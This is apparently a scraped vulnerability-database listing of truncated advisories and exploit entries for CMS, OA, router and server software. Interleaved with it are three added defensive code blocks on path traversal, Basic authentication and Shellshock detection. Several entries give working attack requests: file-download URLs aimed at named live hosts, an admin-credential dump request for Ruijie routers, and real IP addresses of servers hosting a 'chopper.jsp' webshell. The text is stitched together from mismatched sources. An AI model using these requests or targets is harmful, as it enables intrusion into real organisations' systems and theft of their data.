56796 matches found
Zhengfang (正方) Collaborative Office System /zfoa/gwxxbviewhtml.do Arbitrary File Download Vulnerability
0x01 System overview. The Zhengfang Collaborative Office System is designed to help departments quickly build a secure, reliable and easy-to-use integrated document office environment, automating official document handling while serving as a platform for internal communication and information sharing. Its features are: (1) Simple and easy to use: rapid deployment, effortless office work. The interface and workflow match everyday office habits, so after brief training users understand the relevant office settings and can work with the system. (2) Flexible customization to meet individual and changing needs. Organizational structure, form layouts, workflows, access permissions, print formats and statistics are all fully customizable, meeting each unit's current and future office automation needs. (3) Multi-layered security design, providing assurance for office automation...
MidiCart PHP Item_List.PHP Maingroup Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13518/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
youke365 V1.0.7 SQL Injection
...
MetInfo 6.0.0 Arbitrary User Password Change
...
MetInfo 6.0.0 Arbitrary File Read Vulnerability
...
Maccms V8 Backend Getshell #2 (Filter Bypass)
Brief description: In the current V8 release nearly every file is Zend-encrypted, and there is 360safe3.php protection on top. At first I thought there was nothing to be had, then a girl messaged me on WeChat. Girl: What are you up to? Me: Digging for bugs. Girl: Alone? Me: Yep! Girl: I'll come over and dig with you! I shut my machine down on the spot. Damn, trying to grab my WooYun coins? I resolutely went on digging alone. Details: Note that @农村教师 (WooYun: 苹果CMS全版本getshell打包第一弹, the Maccms all-versions getshell bundle, part 1) previously submitted a similar backend getshell, but it has been patched... No more chatter, let's shamelessly bypass it. 1. Directory browsing. The maccms backend has an interface for this, but it is restricted to files under the template directory only...
MetInfo 6.1.0 Backend UPDATE Injection (4)
...
MetInfo 6.0.0 Backend Arbitrary File Read/Download
...
MediaXxx Adult Video / Media Script SQL Injection
No description provided by source...
JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13937/info JamMail is prone to a remote arbitrary command execution vulnerability. This vulnerability may allow an attacker to supply arbitrary commands through the 'jammail.pl' script. This can lead to various attacks...
MetInfo 6.0 Arbitrary File Read
...
MetInfo 6.0.0 Backend SQL Injection
...
metinfo 6.0.0 Backend UPDATE Injection (3)
...
metinfo 6.0.0 Backend SQL Injection
...
Kingdee Collaborative Office Platform Arbitrary File Download Vulnerability (No Login Required)
Brief description: Kingdee Collaborative Office Platform arbitrary file download vulnerability (no login required). Details: Testing shows that the system allows arbitrary file download without logging in. Vulnerable file: /oa/admin/application/filedownload.jsp?filePath= Part of the vulnerable code: An obvious arbitrary file download; a random live instance found online serves as proof: http://oa.xpngs.com/oa/admin/application/filedownload.jsp?filePath=c:\windows\win.ini Simply requesting the URL downloads the file; the saved file...
WordPress admin-ajax.php Remote SQL Injection Vulnerability
WordPress is a free blog system. WordPress has an input validation vulnerability that a remote attacker could exploit to perform SQL injection and gain unauthorized access to the database. The file wp-admin/admin-ajax.php does not properly validate the input to the cookie parameter. At line 6 of wp-admin/admin-ajax.php: ------------------source code---------------------- define('DOING_AJAX', true); check_ajax_referer(); if (!is_user_logged_in()) die('-1');...
VMware ESX Service Console Multiple Security Vulnerabilities
CVE ID: CVE-2005-4268, CVE-2010-0624, CVE-2007-4476, CVE-2010-2063, CVE-2010-1321, CVE-2010-1168, CVE-2010-1447, CVE-2008-5302, CVE-2008-5303 VMware ESX Server is enterprise-class virtual machine software for any system environment. The ESX Console OS (COS) has multiple vulnerabilities in its implementations of cpio, tar, perl, krb5, samba and other applications; the most serious of them can cause a server denial of service or arbitrary code execution. Affected: VMware ESX Server. Vendor patch: VMware -----...
Netgear DGN2200v1 Remote Command Execution
Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE), Unauthenticated Date: 02.07.2021 Exploit Author: SivertPL Vendor Homepage: https://www.netgear.com/ Version: All prior to v1.0.0.60 #!/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL...
Virata EmWeb R6.0.1 - Remote Crash Vulnerability
No description provided by source. Exploit Title: Virata EmWeb R6.0.1 Remote Crash Vulnerability Date: 06/04/10 Author: Jobert Abma Online 24 Email: j.abmaatonline24dotnl Version: R6.0.1 Tested on: linux CVE : Code : This was written for educational purpose. Use it at your own risk. Author will b...
Apple Mac OS X 2008-002 Update Fixes Multiple Security Vulnerabilities
BUGTRAQ ID: 28304 CVE(CAN) ID:...
Cisco RV132W Multiple Vulnerabilities(CVE-2018-0125/CVE-2018-0127)
Vulnerabilities Summary: The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless-N VPN Router version 1.0.1.8. The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home...
Yonyou ERP-NC System /NCFindWeb Interface Arbitrary File Download
This vulnerability carries fairly high privileges: it can be used to obtain the database configuration, /etc/passwd and similar information. Vulnerable URL: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml The database password can be read, as shown: /etc/passwd can also be read, as shown: A large number of enterprises, including COFCO and Minsheng E-commerce, are affected...
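Both the Kingdee filePath= entry above and this NCFindWeb filename= entry are the same bug class: a download endpoint that joins a caller-supplied path onto a base directory and serves whatever results. The following is an added example, not code from either product: the handler in its usual vulnerable form beside a hardened version that rejects drive-qualified and absolute input and refuses anything that does not resolve strictly under the base directory. The directory layout (BASE, report.pdf, a prop.xml one level up) is constructed in a temp dir so the script runs offline.

```python
"""Added example, not code from the Kingdee OA or Yonyou NC products:
a download endpoint that takes a caller-supplied path (like filePath= and
filename= above), first in the common vulnerable form and then hardened.
A throwaway directory tree is built in a temp dir so it runs offline."""
import os
import tempfile
from pathlib import Path

# Constructed layout (assumption): the endpoint should only ever serve files
# under BASE; prop.xml sits one level above it, like ../../ierp/bin/prop.xml.
BASE = Path(tempfile.mkdtemp()) / "attachments"
BASE.mkdir()
(BASE / "report.pdf").write_bytes(b"%PDF-1.4 constructed sample report")
(BASE.parent / "prop.xml").write_text("<db user='nc' password='constructed'/>")


def download_vulnerable(file_param: str) -> bytes:
    """Joins the user value onto BASE and opens whatever results.
    '../' sequences walk out of BASE, and on Windows an absolute or
    drive-qualified value (c:\\windows\\win.ini) replaces BASE outright
    because os.path.join discards everything before an absolute component."""
    with open(os.path.join(BASE, file_param), "rb") as fh:
        return fh.read()


def download_hardened(file_param: str) -> bytes:
    """Serves only regular files that resolve to somewhere strictly under BASE."""
    # Reject drive letters, backslashes and leading slashes before joining, so
    # Windows-style input is neither an absolute path on Windows nor an odd
    # relative filename on POSIX.
    if ":" in file_param or "\\" in file_param or file_param.startswith("/"):
        raise PermissionError("absolute or drive-qualified path rejected")
    target = (BASE / file_param).resolve()   # collapses '..' and follows symlinks
    if BASE.resolve() not in target.parents:
        raise PermissionError("path escapes the attachment directory")
    if not target.is_file():
        raise FileNotFoundError(file_param)
    return target.read_bytes()


def probe(file_param: str) -> dict:
    """Run one input through both handlers and report what each did."""
    out = {}
    for name, fn in (("vulnerable", download_vulnerable), ("hardened", download_hardened)):
        try:
            out[name] = fn(file_param)[:20]
        except OSError as exc:            # PermissionError and FileNotFoundError
            out[name] = type(exc).__name__
    return out


if __name__ == "__main__":
    for p in ("report.pdf", "../prop.xml", "c:\\windows\\win.ini"):
        print(p, probe(p))
```

The check is done on the resolved path rather than by string-matching "..": encoded or doubled separators, symlinks inside BASE and platform-specific quirks all collapse in resolve(), and the parents test is the single decision point.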
Sun Solaris IP Implementation Remote Denial of Service Vulnerability
Solaris is a commercial UNIX operating system developed and maintained by Sun. A security vulnerability in the IP implementation of Solaris 8/9 allows a remote, unprivileged user to degrade the performance of a networked Solaris system by sending specially crafted IP packets. Large numbers of spoofed IP fragments and/or a large number of IP fragment reassembly failures may be observed on the Solaris system. For example, running the command: % /usr/bin/netstat -s | /usr/bin/egrep 'ReasmDuplicates|ReasmFails' may show very high values for the ipv6ReasmDuplicates and ipv6ReasmFails counters. In addition, single-processor Solaris...
TP-Link Router Command Injection Vulnerability (CVE-2017-16957)
0x01 Background. The TP-Link TL-WVR and related products are wireless routers from the Chinese company TP-LINK. Multiple TP-Link products have a command injection vulnerability: an attacker who is logged in can send a malicious field which, after string concatenation, results in arbitrary command execution. The vulnerability was discovered by coincoin7 and assigned CVE-2017-16957. 0x02 Affected products: TP-LINK TL-WVR series, TP-LINK TL-WAR series, TP-LINK TL-ER series, TP-LINK TL-R series. 0x03 Vulnerability analysis. Following the link in the original write-up, I downloaded the TL-WVR450L firmware, unpacked it with binwalk to get the squashfs filesystem, then used...
Apache HTTP Server HTTP Basic Authentication Bypass Vulnerability
Bugtraq ID: 35840 CNCAN ID: CNCAN-2009072903 Apache HTTP Server is a popular web server. Apache HTTP Server has an HTTP Basic authentication bypass issue; a remote attacker can exploit it to access protected resources and obtain sensitive information. When a user requests a resource that requires authentication, Apache HTTP Server returns a "401 Authorization Required" response, which also carries an HTTP header stating which authentication mechanism is required. "Basic" authentication is the most common one and consists of the Base64-encoded string username:password; if the credentials are correct the web server returns "200...
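The 401 challenge, Base64 user:password token and 200 response described in this entry form a small protocol, and the usual mistakes are on the verifying side (naive string compare, splitting on the last colon, not validating the Base64). The block below is an added example, not Apache code: a server-side Basic check that parses the Authorization header per RFC 7617, stores derived keys rather than plaintext, compares in constant time and returns the proper challenge. REALM, USERS and the credential store are assumptions for illustration.

```python
"""Added example, not Apache code: the HTTP Basic exchange described above,
done server-side with a constant-time credential check and a proper 401
challenge. REALM, USERS and the credential store are illustrative."""
import base64
import binascii
import hashlib
import hmac
import os

REALM = "Restricted Area"          # assumption: any realm string works
_ITERATIONS = 50_000


def _derive(password: str, salt: bytes) -> bytes:
    """PBKDF2 so the store never holds the plaintext that arrives in the header."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, _ITERATIONS)


# Constructed credential store: user -> (salt, derived key).
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _derive("s3cret:with:colons", _SALT))}
# Dummy entry used for unknown users so response timing does not reveal
# whether a user-id exists.
_DUMMY = (_SALT, _derive("dummy", _SALT))


def basic_header(user: str, password: str) -> str:
    """Client side: 'Basic ' + base64(user ':' password), per RFC 7617."""
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return "Basic " + token


def parse_basic(header):
    """Return (user, password) from an Authorization value, or None if malformed."""
    if not header:
        return None
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None                        # user-id ":" password is mandatory
    user, _, password = raw.partition(":")  # only the first colon delimits
    return user, password


def check_basic(headers: dict):
    """Decide a request: (200, {}) when credentials match, else a 401 challenge."""
    creds = parse_basic(headers.get("Authorization"))
    if creds is not None:
        user, password = creds
        salt, expected = USERS.get(user, _DUMMY)
        ok = hmac.compare_digest(_derive(password, salt), expected)
        if ok and user in USERS:
            return 200, {}
    return 401, {"WWW-Authenticate": f'Basic realm="{REALM}", charset="UTF-8"'}


if __name__ == "__main__":
    print(check_basic({}))
    print(check_basic({"Authorization": basic_header("alice", "s3cret:with:colons")}))
    print(check_basic({"Authorization": basic_header("alice", "nope")}))
```

Note that the password may itself contain colons, so the split is on the first colon only, and that the unknown-user path still runs the key derivation so a probe cannot distinguish "no such user" from "wrong password" by timing.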
Jinchuang (金窗) Educational Administration System /install/mzzup.asp Directory Traversal
No description provided by source...
DirectAdmin 'mysql_backup' Folder Information Disclosure Vulnerability
Bugtraq ID: 47693 DirectAdmin is a feature-rich online virtual hosting management system. DirectAdmin creates MySQL database backup files in the world-readable "mysql_backups" folder, which can disclose the contents of MySQL database backups. Successful exploitation requires that CustomBuild is used to update MySQL and that "mysql_backup" is set to "yes". Affected: JBMC Software DirectAdmin 1.33.6 JBMC Software DirectAdmin 1.33.4 JBMC Software DirectAdmin 1.33.3 JBMC Software...
Outlook Home Page – Another Ruler Vector
Ruler has become a go-to tool for us on external engagements, easily turning compromised mailbox credentials into shells. This has resulted in security being pushed forward and Microsoft responding with patches for the two vectors used in Ruler, namely rules and forms. These were patched with...
sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass
No description provided by source. /* death-star.c sudo v1.8.0-1.8.3p1 sudo_debug format string root exploit + glibc FORTIFY_SOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via nargs integer overflow -...
Postfix SMTP - Shellshock Exploit
No description provided by source. #!/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x (4.2.48) Tested on: Debian 7 postfix smtp server w/procmail CVE : 2014-6271 from...
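The exploit above works because procmail hands mail header values to bash as environment variables, and bash (CVE-2014-6271) executes whatever follows a value that starts with the function-definition prefix "() {". A defender's counterpart, added here as an example and not part of the original listing, scans every header of every MIME part of a message for that prefix; the sample messages are constructed, and header names are illustrative.

```python
"""Added example, not part of the original exploit listing: detection of the
Shellshock (CVE-2014-6271) function-import prefix in mail headers, the
delivery path the Postfix/procmail exploit above relies on. Sample messages
are constructed here; header names are illustrative."""
import email
from email import policy
import re

# Vulnerable bash treated any environment variable whose value began with
# "() {" as a function definition and ran what followed the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock_headers(raw_message: bytes):
    """Return [(header_name, value)] for every header, in every MIME part,
    whose value carries the "() {" prefix. Nested parts matter because mail
    filters also export things like Content-Disposition filenames."""
    msg = email.message_from_bytes(raw_message, policy=policy.compat32)
    hits = []
    for part in msg.walk():
        for name, value in part.items():
            # Unfold continuation lines so a prefix split across them still matches.
            text = str(value).replace("\r\n", " ").replace("\n", " ")
            if SHELLSHOCK_RE.search(text):
                hits.append((name, text.strip()))
    return hits


# Constructed samples (not real traffic).
MALICIOUS = b"""From: () { :;}; /bin/bash -c 'id' <attacker@example.test>
To: victim@example.test
Subject: () { :;}; /usr/bin/touch /tmp/pwned
Date: Fri, 03 Oct 2014 12:00:00 +0000

hello
"""

MULTIPART = b"""From: mallory@example.test
To: bob@example.test
Subject: invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

body
--XX
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="() { :;}; /bin/id"

AAAA
--XX--
"""

BENIGN = b"""From: alice@example.test
To: bob@example.test
Subject: meeting () notes {draft}
Date: Fri, 03 Oct 2014 12:00:00 +0000

see you at 3
"""

if __name__ == "__main__":
    for label, raw in (("malicious", MALICIOUS), ("multipart", MULTIPART), ("benign", BENIGN)):
        print(label, find_shellshock_headers(raw))
```

The regex is deliberately loose about whitespace between "()" and "{"; the cost is an occasional false positive on a subject line that quotes shell code, which is the right trade for a mail gateway check.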
DedeCMS 5.7 /plus/flink_add.php SQL Injection Vulnerability
In common.inc.php the filtering is quite thorough from this point on; continuing downward: // convert the upload-related variables, apply safety handling, and include the common frontend upload function: if ($_FILES) require_once(DEDEINC.'/uploadsafe.inc.php'); Then in uploadsafe.inc.php, line 29: $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']); which makes it possible to bypass GPC. plus/flink.php: although all of them go through...
Dnsmasq Stack based overflow(CVE-2017-14493)
1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i --name dnsmasqtest dnsmasq bash docker cp poc.py dnsmasqtest:/poc.py docker exec -it bash 2 On one terminal start dnsmasq: /test/dnsmasqnoasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff dnsmasq:...
SX Design sipd 0.1.2/0.1.4 - Remote Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9236/info sipd has been reported prone to a format string vulnerability that may be triggered remotely. It has been reported that sip URI arguments passed to the affected server are not sufficiently handled. An attacker m...
storytlr "search" Cross-Site Scripting Vulnerability
storytlr is a blogging platform. Because input passed via the "search" parameter to index.php/search/ is not properly sanitized in protected/application/public/controllers/SearchController.php before being returned to the user, an attacker can exploit this to execute arbitrary HTML and script code in a user's browser session in the context of the affected site. Affected: storytlr 1.2. The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version: http://storytlr.org/...
OpenSSL Denial of Service (CVE-2021-3449)
...
MetInfo 5.1 Arbitrary File Upload Vulnerability (getshell)
No description provided by source...
Yonyou NC Integrated Office System /service/~iufo/com.ufida.web.action.ActionServlet User Information Disclosure
No description provided by source...
GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit
No description provided by source. FTP server GNU inetutils 1.4.2 Remote Root Exploit This program remotely exploits the most recent versions of GNU inetutils ftpd on linux systems. Requirements: 1. There MUST be a chroot'ed environment for the logged in user 2. Directory etc must be writeable by...
Samba NetLogon Uninitialized Pointer Vulnerability (CVE-2015-0240)
No description provided by source. #!/usr/bin/env python # coding: utf-8 import sys import time from struct import pack,unpack import argparse import impacket from impacket.dcerpc.v5 import transport, nrpc from impacket.dcerpc.v5.ndr import NDRCALL from impacket.dcerpc.v5.dtypes import WSTR class...
WeBid 1.0.6 - SQL Injection Vulnerability
No description provided by source. Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability Google Dork: Powered by WeBid Date: 1/9/13 Exploit Author: Life Wasted Vendor Homepage: http://www.webidsupport.com/ Version: Tested on 1.0.6, but could affect other version Tested On: Linux, Windows...
apache2 vulnerabilities
No description provided by source. =========================================================== Ubuntu Security Notice USN-860-1 November 19, 2009 apache2 vulnerabilities CVE-2009-3094, CVE-2009-3095, CVE-2009-3555 =========================================================== A security issue affect...
Exchange ProxyOracle Information Disclosure Exploit Chain (CVE-2021-31195, CVE-2021-31196)
...
PHP Links <= 1.3 (vote.php id) Remote SQL Injection Vulnerability
No description provided by source. ------------------------------------------------------------- ----- H-T Team HouSSaMix + ToXiC350 from MoroCCo -------- ------------------------------------------------------------- = Author : Houssamix From H-T Team = Script : PHP Links from DeltaScripts = 1.3 ...
Git for Visual Studio Remote Code Execution Vulnerability (CVE-2021-21300)
...
Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit
No description provided by source. black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright (c) 2007 Eliteboy use IO::Socket; print "Sendmail w/ clamav-milter Remote Root Exploit\n"; print "Copyright (C) 2007 Eliteboy\n"; if ($#ARGV != 0) { print "Give me a host to connect.\n"; exit; } print "Attacking...
phpems Frontend Getshell in Four Places
Brief description: phpems frontend getshell vulnerabilities in four places. Details: 2. phpems frontend getshell in four places. The vulnerable code is in the upload, uploadfile, swupload and swfuploadvideo functions of /app/document/api.php. All four handle file uploads and do so in exactly the same way, so all four have an arbitrary file upload vulnerability. First, all four functions can be reached by a registered, logged-in user by adjusting the URL parameters. Next, taking swfuploadvideo as the example: public function swfuploadvideo() { $path = 'files/attach/images/content/'.date('Ymd').'/...
Microsoft Windows WSDAPI Service Remote Memory Corruption Vulnerability (MS09-063)
BUGTRAQ ID: 36919 CVE ID: CVE-2009-2512 Microsoft Windows is Microsoft's very widely used operating system. A memory corruption vulnerability exists in the Web Services on Devices API (WSDAPI) in Windows. A remote attacker can trigger it by sending a WSD message with malformed headers to the WSDAPI service, leading to execution of arbitrary code on the user's system. Affected: Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Vista Microsoft Windows Server 2008 SP2 Microsoft Window...
Mac OS X 2007-007 Update Fixes Multiple Security Vulnerabilities
CVE(CAN) ID:...
Yonyou Important System Arbitrary File Upload Vulnerability, Part 2
Brief description: Yonyou important system arbitrary file upload vulnerability, part 2. Details: Yonyou GRP-U8 financial management software. The servlet is vulnerable and allows uploading arbitrary files straight to the server. None. Here: http://210.44.112.101 https://images.seebug.org/upload/chopper.jsp chopper 5 cases: http://210.44.112.101/UploadFile http://124.128.96.98:8001/UploadFile http://61.139.105.105:8008/UploadFile...
Ruijie Router NBR Information Disclosure Vulnerability
Use ModifyHeaders to set the Cookie header to: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; then use Hackbar to send a POST to: http://localhost/WEBVMS/LEVEL15/ with the body: command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. This returns the admin account and password. #!/usr/bin/env python # coding: utf-8 import re from pocsuite.net import req fr...